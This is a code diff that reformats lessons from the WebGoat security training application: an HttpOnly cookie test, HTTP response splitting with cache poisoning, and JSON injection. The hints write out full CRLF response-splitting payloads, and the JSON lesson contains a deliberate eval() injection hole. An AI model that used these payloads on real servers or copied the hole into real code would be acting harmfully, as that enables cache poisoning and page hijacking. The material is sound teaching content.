+						.setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '"
+								+ UNIQUE2U + "' cookie.");
+				s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked
+						+ " on the client side.");
+			}
+			else
+			{
+				s
+						.setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '"
+								+ UNIQUE2U + "' cookie by preventing client side modification.");
+				if (readSuccess)
+				{
+					if (!this.isCompleted(s))
+					{
 						makeSuccess(s);
 						readSuccess = false;
 						writeSuccess = false;
 					}
-				} else {
-					if (!this.isCompleted(s)) {
+				}
+				else
+				{
+					if (!this.isCompleted(s))
+					{
 						s.setMessage("Now try to see if your browser protects read access to this cookie.");
 						writeSuccess = true;
 					}
 				}
 			}
-		} else if(!original.equals(hacked)) {
-			s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U 
+		}
+		else if (!original.equals(hacked))
+		{
+			s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U
 					+ "' cookie to be modified on the client side.");
-		} else {
-			s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U 
+		}
+		else
+		{
+			s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U
 					+ "' cookie to be modified on the client side, but it was not for some reason. "
 					+ "(This shouldn't happen)");
 		}
 	}
-	
-	private String getJavaScript() {
+
+	private String getJavaScript()
+	{
 		StringBuffer buffer = new StringBuffer();
-		
+
 		buffer.append("<script language=\"javascript\">\n");
 		buffer.append("function myAlert() {\n");
 		buffer.append("alert(document.cookie);\n");
@@ -375,63 +432,85 @@ public class HttpOnly extends LessonAdapter {
 		buffer.append("return true;\n");
 		buffer.append("}\n");
 		buffer.append("</script>\n");
-		
+
 		return buffer.toString();
 	}
-	
-	private String getBrowserType(WebSession s) {
+
+	private String getBrowserType(WebSession s)
+	{
 		int offset = -1;
 		String result = "unknown";
 		String browser = s.getHeader("user-agent").toLowerCase();
-		
-		if(browser != null) {
-			if(browser.indexOf("firefox") != -1) {
+
+		if (browser != null)
+		{
+			if (browser.indexOf("firefox") != -1)
+			{
 				browser = browser.substring(browser.indexOf("firefox"));
-				
+
 				offset = getOffset(browser);
-				
+
 				result = browser.substring(0, offset);
-			} else if(browser.indexOf("msie 6") != -1) {
+			}
+			else if (browser.indexOf("msie 6") != -1)
+			{
 				result = "Internet Explorer 6";
-			} else if(browser.indexOf("msie 7") != -1) {
+			}
+			else if (browser.indexOf("msie 7") != -1)
+			{
 				result = "Internet Explorer 7";
-			} else if(browser.indexOf("msie") != -1) {
+			}
+			else if (browser.indexOf("msie") != -1)
+			{
 				result = "Internet Explorer";
-			} else if(browser.indexOf("opera") != -1) {
+			}
+			else if (browser.indexOf("opera") != -1)
+			{
 				result = "Opera";
-			} else if(browser.indexOf("safari") != -1) {
+			}
+			else if (browser.indexOf("safari") != -1)
+			{
 				result = "Safari";
-			} else if(browser.indexOf("netscape") != -1) {
+			}
+			else if (browser.indexOf("netscape") != -1)
+			{
 				browser = browser.substring(browser.indexOf("netscape"));
-				
+
 				offset = getOffset(browser);
-				
+
 				result = browser.substring(0, offset);
-			} else if(browser.indexOf("konqueror") != -1) {
+			}
+			else if (browser.indexOf("konqueror") != -1)
+			{
 				result = "Konqueror";
-			} else if(browser.indexOf("mozilla") != -1) {
+			}
+			else if (browser.indexOf("mozilla") != -1)
+			{
 				result = "Mozilla";
 			}
 		}
-		
+
 		return result;
 	}
-	
-	private int getOffset(String s) {
+
+	private int getOffset(String s)
+	{
 		int result = s.length();
-		
-		for(int i=0; i<s.length(); i++) {
-			if(s.charAt(i) < 33 || s.charAt(i) > 126) {
+
+		for (int i = 0; i < s.length(); i++)
+		{
+			if (s.charAt(i) < 33 || s.charAt(i) > 126)
+			{
 				result = i;
 				break;
 			}
 		}
-		
+
 		return result;
 	}
-	
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java
index 74f68d5aa..3317e465c 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.PrintWriter;
@@ -5,293 +6,261 @@ import java.net.URLDecoder;
 import java.text.DateFormat;
 import java.text.SimpleDateFormat;
 import java.util.*;
-
 import javax.servlet.http.HttpServletResponse;
-
 import org.apache.ecs.*;
 import org.apache.ecs.html.*;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    September 30, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created September 30, 2006
  */
 
 public class HttpSplitting extends SequentialLessonAdapter
 {
 
-    private final static String LANGUAGE = "language";
+	private final static String LANGUAGE = "language";
 
-    private final static String REDIRECT = "fromRedirect";
+	private final static String REDIRECT = "fromRedirect";
 
-    private static String STAGE = "stage";
+	private static String STAGE = "stage";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    /**
-     * Description of the Method
-     * 
-     * @param s Current WebSession
-     */
-    public void handleRequest(WebSession s)
-    {
-	//Setting a special action to be able to submit to redirect.jsp
-	Form form = new Form("/WebGoat/lessons/General/redirect.jsp?"
-		+ "Screen=" + String.valueOf(getScreenId()) + "&menu="
-		+ getDefaultCategory().getRanking().toString(), Form.POST)
-		.setName("form").setEncType("");
-
-	form.addElement(createContent(s));
-
-	setContent(form);
-    }
-
-
-    protected Element doHTTPSplitting(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	String lang = null;
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Current WebSession
+	 */
+	public void handleRequest(WebSession s)
 	{
-	    ec.addElement(createAttackEnvironment(s));
-	    lang = URLDecoder.decode(s.getParser()
-		    .getRawParameter(LANGUAGE, ""), "UTF-8");
+		// Setting a special action to be able to submit to redirect.jsp
+		Form form = new Form("/WebGoat/lessons/General/redirect.jsp?" + "Screen=" + String.valueOf(getScreenId())
+				+ "&menu=" + getDefaultCategory().getRanking().toString(), Form.POST).setName("form").setEncType("");
 
-	    //Check if we are coming from the redirect page
-	    String fromRedirect = s.getParser().getStringParameter(
-		    "fromRedirect", "");
+		form.addElement(createContent(s));
 
-	    if (lang.length() != 0 && fromRedirect.length() != 0)
-	    {
-		//Split by the line separator line.separator is platform independant
-		String lineSep = System.getProperty("line.separator");
-		String[] arrTokens = lang.toString().toUpperCase().split(
-			lineSep);
+		setContent(form);
+	}
 
-		//Check if the user ended the first request and wrote the second malacious reply
+	protected Element doHTTPSplitting(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		String lang = null;
 
-		if (Arrays.binarySearch(arrTokens, "CONTENT-LENGTH: 0") >= 0
-			&& Arrays.binarySearch(arrTokens, "HTTP/1.1 200 OK") >= 0)
+		try
 		{
-		    HttpServletResponse res = s.getResponse();
-		    res.setContentType("text/html");
-		    PrintWriter out = new PrintWriter(res.getOutputStream());
-		    String message = lang.substring(lang.indexOf("<html>"));
+			ec.addElement(createAttackEnvironment(s));
+			lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
 
-		    out.print(message);
-		    out.flush();
-		    out.close();
+			// Check if we are coming from the redirect page
+			String fromRedirect = s.getParser().getStringParameter("fromRedirect", "");
 
-		    getLessonTracker(s).setStage(2);
+			if (lang.length() != 0 && fromRedirect.length() != 0)
+			{
+				// Split by the line separator line.separator is platform independant
+				String lineSep = System.getProperty("line.separator");
+				String[] arrTokens = lang.toString().toUpperCase().split(lineSep);
 
-		    StringBuffer msg = new StringBuffer();
+				// Check if the user ended the first request and wrote the second malacious reply
 
-		    msg.append("Good Job! ");
-		    msg
-			    .append("This lesson has detected your successfull attack, ");
-		    msg
-			    .append("time to elevate your attack to a higher level. ");
-		    msg
-			    .append("Try again and add Last-Modified header, intercept");
-		    msg.append("the reply and replace it with a 304 reply.");
+				if (Arrays.binarySearch(arrTokens, "CONTENT-LENGTH: 0") >= 0
+						&& Arrays.binarySearch(arrTokens, "HTTP/1.1 200 OK") >= 0)
+				{
+					HttpServletResponse res = s.getResponse();
+					res.setContentType("text/html");
+					PrintWriter out = new PrintWriter(res.getOutputStream());
+					String message = lang.substring(lang.indexOf("<html>"));
 
-		    s.setMessage(msg.toString());
+					out.print(message);
+					out.flush();
+					out.close();
 
-		}
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
-	}
-	return (ec);
-    }
+					getLessonTracker(s).setStage(2);
 
+					StringBuffer msg = new StringBuffer();
 
-    protected Element createContent(WebSession s)
-    {
-	return super.createStagedContent(s);
-    }
+					msg.append("Good Job! ");
+					msg.append("This lesson has detected your successfull attack, ");
+					msg.append("time to elevate your attack to a higher level. ");
+					msg.append("Try again and add Last-Modified header, intercept");
+					msg.append("the reply and replace it with a 304 reply.");
 
+					s.setMessage(msg.toString());
 
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	return doHTTPSplitting(s);
-    }
-
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	return doCachePoisining(s);
-    }
-
-
-    protected Element createAttackEnvironment(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	String lang = null;
-
-	if (getLessonTracker(s).getStage() == 1)
-	{
-	    ec.addElement(new H3("Stage 1: HTTP Splitting:<br><br>"));
-	}
-	else
-	{
-	    ec.addElement(new H3("Stage 2: Cache Poisoning:<br><br>"));
-	}
-	ec.addElement(new StringElement("Search by country : "));
-
-	lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""),
-		"UTF-8");
-
-	//add the search by field
-	Input input = new Input(Input.TEXT, LANGUAGE, lang.toString());
-	ec.addElement(input);
-
-	Element b = ECSFactory.makeButton("Search!");
-
-	ec.addElement(b);
-
-	return ec;
-    }
-
-
-    protected Element doCachePoisining(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
-	{
-	    s
-		    .setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison"
-			    + " the victim's cache. Type 'restart' in the input field if you wish to "
-			    + " to return to the HTTP Splitting lesson.<br><br>");
-	    if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals(
-		    "restart"))
-	    {
-		getLessonTracker(s).getLessonProperties().setProperty(STAGE,
-			"1");
-		return (doHTTPSplitting(s));
-	    }
-
-	    ec.addElement(createAttackEnvironment(s));
-	    String lang = URLDecoder.decode(s.getParser().getRawParameter(
-		    LANGUAGE, ""), "UTF-8");
-	    String fromRedirect = s.getParser()
-		    .getStringParameter(REDIRECT, "");
-
-	    if (lang.length() != 0 && fromRedirect.length() != 0)
-	    {
-		String lineSep = System.getProperty("line.separator");
-		String dateStr = lang.substring(lang.indexOf("Last-Modified:")
-			+ "Last-Modified:".length(), lang.indexOf(lineSep, lang
-			.indexOf("Last-Modified:")));
-		if (dateStr.length() != 0)
+				}
+			}
+		} catch (Exception e)
 		{
-		    Calendar cal = Calendar.getInstance();
-
-		    DateFormat sdf = new SimpleDateFormat(
-			    "EEE, dd MMM yyyy HH:mm:ss z", Locale.US);
-
-		    if (sdf.parse(dateStr.trim()).after(cal.getTime()))
-		    {
-			makeSuccess(s);
-		    }
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	    }
+		return (ec);
 	}
-	catch (Exception ex)
+
+	protected Element createContent(WebSession s)
 	{
-	    ec.addElement(new P().addElement(ex.getMessage()));
+		return super.createStagedContent(s);
 	}
-	return ec;
-    }
 
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		return doHTTPSplitting(s);
+	}
 
-    protected Category getDefaultCategory()
-    {
-	return Category.GENERAL;
-    }
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		return doCachePoisining(s);
+	}
 
+	protected Element createAttackEnvironment(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		String lang = null;
 
-    protected List<String> getHints(WebSession s)
-    {
+		if (getLessonTracker(s).getStage() == 1)
+		{
+			ec.addElement(new H3("Stage 1: HTTP Splitting:<br><br>"));
+		}
+		else
+		{
+			ec.addElement(new H3("Stage 2: Cache Poisoning:<br><br>"));
+		}
+		ec.addElement(new StringElement("Search by country : "));
 
-	List<String> hints = new ArrayList<String>();
-	hints.add("Enter a language for the system to search by.");
-	hints.add("Use CR (%0d) and LF (%0a) for a new line");
-	hints
-		.add("The Content-Length: 0 will tell the server that the first request is over.");
-	hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
-	hints
-		.add("Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
-	hints
-		.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
-	hints
-		.add("Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
-	hints
-		.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
-	hints
-		.add("Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
-	return hints;
+		lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
 
-    }
+		// add the search by field
+		Input input = new Input(Input.TEXT, LANGUAGE, lang.toString());
+		ec.addElement(input);
 
-    private final static Integer DEFAULT_RANKING = new Integer(20);
+		Element b = ECSFactory.makeButton("Search!");
 
+		ec.addElement(b);
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+		return ec;
+	}
 
+	protected Element doCachePoisining(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
 
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("HTTP Splitting");
-    }
+		try
+		{
+			s.setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison"
+					+ " the victim's cache. Type 'restart' in the input field if you wish to "
+					+ " to return to the HTTP Splitting lesson.<br><br>");
+			if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals("restart"))
+			{
+				getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
+				return (doHTTPSplitting(s));
+			}
 
+			ec.addElement(createAttackEnvironment(s));
+			String lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
+			String fromRedirect = s.getParser().getStringParameter(REDIRECT, "");
 
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
+			if (lang.length() != 0 && fromRedirect.length() != 0)
+			{
+				String lineSep = System.getProperty("line.separator");
+				String dateStr = lang.substring(lang.indexOf("Last-Modified:") + "Last-Modified:".length(), lang
+						.indexOf(lineSep, lang.indexOf("Last-Modified:")));
+				if (dateStr.length() != 0)
+				{
+					Calendar cal = Calendar.getInstance();
+
+					DateFormat sdf = new SimpleDateFormat("EEE, dd MMM yyyy HH:mm:ss z", Locale.US);
+
+					if (sdf.parse(dateStr.trim()).after(cal.getTime()))
+					{
+						makeSuccess(s);
+					}
+				}
+			}
+		} catch (Exception ex)
+		{
+			ec.addElement(new P().addElement(ex.getMessage()));
+		}
+		return ec;
+	}
+
+	protected Category getDefaultCategory()
+	{
+		return Category.GENERAL;
+	}
+
+	protected List<String> getHints(WebSession s)
+	{
+
+		List<String> hints = new ArrayList<String>();
+		hints.add("Enter a language for the system to search by.");
+		hints.add("Use CR (%0d) and LF (%0a) for a new line");
+		hints.add("The Content-Length: 0 will tell the server that the first request is over.");
+		hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
+		hints
+				.add("Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+		hints
+				.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
+		hints
+				.add("Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+		hints
+				.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
+		hints
+				.add("Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
+		return hints;
+
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(20);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("HTTP Splitting");
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java
index 90fd63c6d..fe44a476f 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java
@@ -1,7 +1,7 @@
+
 package org.owasp.webgoat.lessons;
 
 import org.owasp.webgoat.session.WebSession;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -13,303 +13,286 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.Input;
 import org.apache.ecs.html.BR;
-
 import java.io.PrintWriter;
 import java.util.List;
 import java.util.ArrayList;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    December 25, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created December 25, 2006
  */
 
 public class JSONInjection extends LessonAdapter
 {
 
-    private final static Integer DEFAULT_RANKING = new Integer(30);
+	private final static Integer DEFAULT_RANKING = new Integer(30);
 
-    private final static String TRAVEL_FROM = "travelFrom";
+	private final static String TRAVEL_FROM = "travelFrom";
 
-    private final static String TRAVEL_TO = "travelTo";
+	private final static String TRAVEL_TO = "travelTo";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    public void handleRequest(WebSession s)
-    {
-
-	try
+	public void handleRequest(WebSession s)
 	{
-	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
-	    {
+
+		try
+		{
+			if (s.getParser().getRawParameter("from", "").equals("ajax"))
+			{
+				String lineSep = System.getProperty("line.separator");
+				String jsonStr = "{" + lineSep + "\"From\": \"Boston\"," + lineSep + "\"To\": \"Seattle\", " + lineSep
+						+ "\"flights\": [" + lineSep
+						+ "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," + lineSep
+						+ "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} " + lineSep + "]"
+						+ lineSep + "}";
+				s.getResponse().setContentType("text/html");
+				s.getResponse().setHeader("Cache-Control", "no-cache");
+				PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
+				out.print(jsonStr);
+				out.flush();
+				out.close();
+				return;
+			}
+		} catch (Exception ex)
+		{
+			ex.printStackTrace();
+		}
+
+		Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+		form.setOnSubmit("return check();");
+
+		form.addElement(createContent(s));
+
+		setContent(form);
+
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Current WebSession
+	 */
+
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 		String lineSep = System.getProperty("line.separator");
-		String jsonStr = "{"
-			+ lineSep
-			+ "\"From\": \"Boston\","
-			+ lineSep
-			+ "\"To\": \"Seattle\", "
-			+ lineSep
-			+ "\"flights\": ["
-			+ lineSep
-			+ "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"},"
-			+ lineSep
-			+ "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} "
-			+ lineSep + "]" + lineSep + "}";
-		s.getResponse().setContentType("text/html");
-		s.getResponse().setHeader("Cache-Control", "no-cache");
-		PrintWriter out = new PrintWriter(s.getResponse()
-			.getOutputStream());
-		out.print(jsonStr);
-		out.flush();
-		out.close();
-		return;
-	    }
+		String script = "<script>"
+				+ lineSep
+				+ "function getFlights() {"
+				+ lineSep
+				+ "var fromField = document.getElementById('"
+				+ TRAVEL_FROM
+				+ "');"
+				+ lineSep
+				+ "if (fromField.value.length < 3 || fromField.value!='BOS') { return; }"
+				+ lineSep
+				+ "var toField = document.getElementById('"
+				+ TRAVEL_TO
+				+ "');"
+				+ lineSep
+				+ "if (toField.value.length < 3 || toField.value!='SEA') { return; }"
+				+ lineSep
+				+ "var url = '"
+				+ getLink()
+				+ "&from=ajax&"
+				+ TRAVEL_FROM
+				+ "=' + encodeURIComponent(fromField.value) +"
+				+ "'&"
+				+ TRAVEL_TO
+				+ "=' + encodeURIComponent(toField.value);"
+				+ lineSep
+				+ "if (typeof XMLHttpRequest != 'undefined') {"
+				+ lineSep
+				+ "req = new XMLHttpRequest();"
+				+ lineSep
+				+ "} else if (window.ActiveXObject) {"
+				+ lineSep
+				+ "req = new ActiveXObject('Microsoft.XMLHTTP');"
+				+ lineSep
+				+ "   }"
+				+ lineSep
+				+ "   req.open('GET', url, true);"
+				+ lineSep
+				+ "   req.onreadystatechange = callback;"
+				+ lineSep
+				+ "   req.send(null);"
+				+ lineSep
+				+ "}"
+				+ lineSep
+				+ "function callback() {"
+				+ lineSep
+				+ "    if (req.readyState == 4) { "
+				+ lineSep
+				+ "        if (req.status == 200) { "
+				+ lineSep
+				+ "                   var card = eval('(' + req.responseText + ')');"
+				+ lineSep
+				+ "			 var flightsDiv = document.getElementById('flightsDiv');"
+				+ lineSep
+				+ "				flightsDiv.innerHTML = '';"
+				+ lineSep
+				+ "				var strHTML='';"
+				+ lineSep
+				+ "				strHTML = '<tr><td>&nbsp;</td><td>No of Stops</td>';"
+				+ lineSep
+				+ "				strHTML = strHTML + '<td>Stops</td><td>Prices</td></tr>';"
+				+ lineSep
+				+ "			 for(var i=0; i<card.flights.length; i++){"
+				+ lineSep
+				+ "				var node = card.flights[i];"
+				+ lineSep
+				+ "				strHTML = strHTML + '<tr><td><input name=\"radio'+i+'\" type=\"radio\" id=\"radio'+i+'\"></td><td>';"
+				+ lineSep
+				+ "			    strHTML = strHTML + card.flights[i].stops + '</td><td>';"
+				+ lineSep
+				+ "			    strHTML = strHTML + card.flights[i].transit + '</td><td>';"
+				+ lineSep
+				+ "			    strHTML = strHTML + '<div name=\"priceID'+i+'\" id=\"priceID'+i+'\">' + card.flights[i].price + '</div></td></tr>';"
+				+ lineSep
+				+ "			 }"
+				+ lineSep
+				+ "				strHTML = '<table border=\"1\">' + strHTML + '</table>';"
+				+ lineSep
+				+ "               flightsDiv.innerHTML = strHTML;"
+				+ lineSep
+				+ "        }}}"
+				+ lineSep
+				+
+
+				"function check(){"
+				+ lineSep
+				+ " if ( document.getElementById('radio0').checked  )"
+				+ lineSep
+				+ " { document.getElementById('price2Submit').value = document.getElementById('priceID0').innerHTML; return true;}"
+				+ lineSep
+				+ " else if ( document.getElementById('radio1').checked  )"
+				+ lineSep
+				+ " { document.getElementById('price2Submit').value = document.getElementById('priceID1').innerHTML; return true;}"
+				+ lineSep + " else " + lineSep + " { alert('Please choose one flight'); return false;}" + lineSep + "}"
+				+ lineSep + "</script>" + lineSep;
+		ec.addElement(new StringElement(script));
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
+
+		TR tr = new TR();
+
+		tr.addElement(new TD("From: "));
+		Input in = new Input(Input.TEXT, TRAVEL_FROM, "");
+		in.addAttribute("onkeyup", "getFlights();");
+		in.addAttribute("id", TRAVEL_FROM);
+		tr.addElement(new TD(in));
+
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD("To: "));
+		in = new Input(Input.TEXT, TRAVEL_TO, "");
+		in.addAttribute("onkeyup", "getFlights();");
+		in.addAttribute("id", TRAVEL_TO);
+		tr.addElement(new TD(in));
+
+		t1.addElement(tr);
+		ec.addElement(t1);
+
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+		Div div = new Div();
+		div.addAttribute("name", "flightsDiv");
+		div.addAttribute("id", "flightsDiv");
+		ec.addElement(div);
+
+		Input b = new Input();
+		b.setType(Input.SUBMIT);
+		b.setValue("Submit");
+		b.setName("SUBMIT");
+		ec.addElement(b);
+
+		Input price2Submit = new Input();
+		price2Submit.setType(Input.HIDDEN);
+		price2Submit.setName("price2Submit");
+		price2Submit.setValue("");
+		price2Submit.addAttribute("id", "price2Submit");
+		ec.addElement(price2Submit);
+		if (s.getParser().getRawParameter("radio0", "").equals("on"))
